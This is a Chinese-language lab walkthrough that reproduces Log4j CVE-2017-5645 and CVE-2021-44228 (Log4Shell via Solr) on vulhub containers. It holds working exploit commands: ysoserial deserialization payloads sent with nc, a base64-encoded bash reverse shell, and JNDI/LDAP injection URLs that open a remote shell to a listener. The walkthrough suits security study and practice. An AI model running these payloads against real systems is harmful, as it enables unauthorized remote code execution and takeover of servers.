log4j漏洞复现

靶场搭建

下载vulhub

1
git clone --depth 1 https://github.com/vulhub/vulhub

进入目录,启动容器

1
2
cd vulhub/log4j/CVE-2017-5645/
docker compose up -d

关闭容器

1
docker compose down

Apache Log4j是一个广泛使用的Java日志记录库,它通过提供灵活的日志记录级别、日志格式和日志目的地等功能,成为了许多开发者和组织的首选日志工具。

cve-2017-5645

漏洞背景

Log4j 是 Apache 软件基金会开发的 Java 日志框架,广泛用于企业级应用。其 SocketServer 功能允许通过网络接收日志事件,但在早期版本中未对输入对象进行安全检查。攻击者可向日志监听端口发送精心构造的恶意对象,导致目标服务器反序列化并执行任意代码。

攻击机理

该漏洞利用了 Java 对象反序列化机制的固有风险。当 SocketServer 接收序列化对象流时,若数据来自不受信任来源且未启用安全策略,恶意对象会在反序列化过程中触发任意代码执行。此攻击无需身份验证,只要网络端口可达即可能被利用。

影响版本:Apache Log4j 2.0-beta9 ~ 2.8.1

复现

端口扫描

1
2
3
4
5
6
7
8
9
nmap 192.168.4.134 -p 4712
Starting Nmap 7.95 ( https://nmap.org ) at 2026-05-07 16:43 CST
Nmap scan report for 192.168.4.134
Host is up (0.00072s latency).

PORT STATE SERVICE
4712/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds

Log4j SocketServer 默认端口:4712

验证:

工具:https://github.com/Y4er/ysoserial/releases

1
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "touch /tmp/CVE-2017-5645_is_success" | nc 192.168.4.134 4712

查看:

1
2
3
4
5
#进入CVE-2017-564容器内部
root@ubuntu:/home/ctfer/vulhub/log4j/CVE-2017-5645# docker exec -it f48cea157aa8 bash
#成功创建CVE-2017-5645_is_success文件
root@f48cea157aa8:/# ls /tmp/
CVE-2017-5645_is_success hsperfdata_root

反弹shell:

生成shell:https://forum.ywhack.com/shell.php

1
2

java -jar "D:\TOOLS\ysoserial-0.0.6-SNAPSHOT-all.jar" CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQuMS85OTk5IDA+JjE=}|{base64,-d}|{bash,-i}" | nc 192.168.4.134 4712
image-20260507181954648

cve-2021-44228_solr_1漏洞复现

影响版本:Log4j 2.0-beta9 ~ 2.14.1

搭建靶场

image-20260507142040758

查看映射端口

image-20260507142129804

Solr(读作“solar”)是Apache Lucene项目的开源企业搜索平台。其主要功能包括全文检索、命中标示[2]、分面搜索、动态聚类、数据库集成,以及富文本(如Word、PDF)的处理。Solr是高度可扩展的,并提供了分布式搜索和索引复制。Solr是最流行的企业级搜索引擎

solr后台:

image-20260507143419172

Dnslog验证:

1
http://192.168.4.134:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.lzeckl.dnslog.cn}

image-20260507213749044

反弹shell:

工具:https://github.com/0x727/JNDIExploit/releases/tag/1.1

中转站ip:192.168.4.128

image-20260507221501986

攻击机ip:192.168.4.1监听6666端口:

1
nc -lvp 6666

访问

1
http://192.168.4.134:8983/solr/admin/cores?action=${jndi:ldap://192.168.4.128:1389/Basic/ReverseShell/192.168.4.1/6666}

image-20260507221747311

受害机ip:192.168.4.134

getshell

image-20260507221333235

参考:https://cloud.tencent.com/developer/article/1701706

https://cloud.tencent.com/developer/article/1922504

Next postenspAR启动报错解决